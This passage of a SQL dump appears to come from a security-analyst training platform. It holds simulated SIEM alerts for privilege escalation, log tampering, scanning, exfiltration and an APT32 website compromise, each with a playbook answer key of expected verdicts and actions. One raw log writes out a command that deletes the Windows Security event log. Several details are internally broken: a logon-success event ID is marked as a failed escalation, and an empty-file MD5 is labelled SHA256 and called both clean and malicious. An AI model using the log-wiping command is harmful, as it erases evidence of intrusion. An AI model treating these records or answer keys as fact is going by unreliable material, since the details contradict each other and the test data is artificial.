'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in previous suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard 
User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(331, 'Attempt to Cover Tracks Detected', 'high', 'Log Monitoring System', 'An advanced attack has been detected where log files are being tampered with, indicating an attempt to erase evidence of an attack.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', 189, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"4625\",\"system\":{\"hostname\":\"server01.internal.local\",\"ip_address\":\"192.168.1.15\"},\"user\":{\"username\":\"attacker_user\",\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"action\":\"Delete\",\"target_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process\":{\"name\":\"cmd.exe\",\"id\":\"5604\",\"command_line\":\"cmd.exe /c del C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"port\":\"445\"},\"hash\":{\"algorithm\":\"SHA256\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-02 20:29:44', '2026-03-09 03:10:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attack campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del 
C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(332, 'Internal Reconnaissance Detected', 'high', 'SIEM Alerts', 'The attacker performs scans and probes to map out the network and identify further targets. Advanced techniques were used to evade detection during reconnaissance activities.', 'Reconnaissance', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"rec-2023-00123\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"scanned_ports\":[22,80,443,445],\"protocol\":\"TCP\",\"detected_tool\":\"nmap\",\"username\":\"admin\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"network_scan\",\"outcome\":\"success\"}', '2026-01-02 20:29:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known scanning activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by scan.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with reconnaissance tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(333, 'Final Data Extraction Detected', 'critical', 'Data Exfiltration Monitoring', 'Large volumes of data are prepared for final exfiltration, marking the conclusion of the attack operation. Data transfer detected from internal network to an external IP linked with known malicious activity.', 'Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:45:00Z\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.99\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"bytes_transferred\":104857600,\"indicator_of_compromise\":true}', '2026-01-02 20:29:44', '2026-02-18 15:16:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash found in recent suspicious activity reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches naming pattern of sensitive data archives.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(334, 'Compromised Website Detected', 'high', 'Web Proxy Logs', 'APT32 has injected malicious JavaScript into the human rights organization\'s website, setting the stage for the delivery of a malicious payload to site visitors.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:52Z\",\"client_ip\":\"192.168.1.105\",\"request_method\":\"GET\",\"host\":\"humanrights.org\",\"url\":\"/index.html\",\"referrer\":\"http://malicious-redirect.com/landing\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\",\"status_code\":200,\"response_size\":4521,\"malicious_js_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT32 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript used by APT32\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-redirect.com/landing\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns and malware 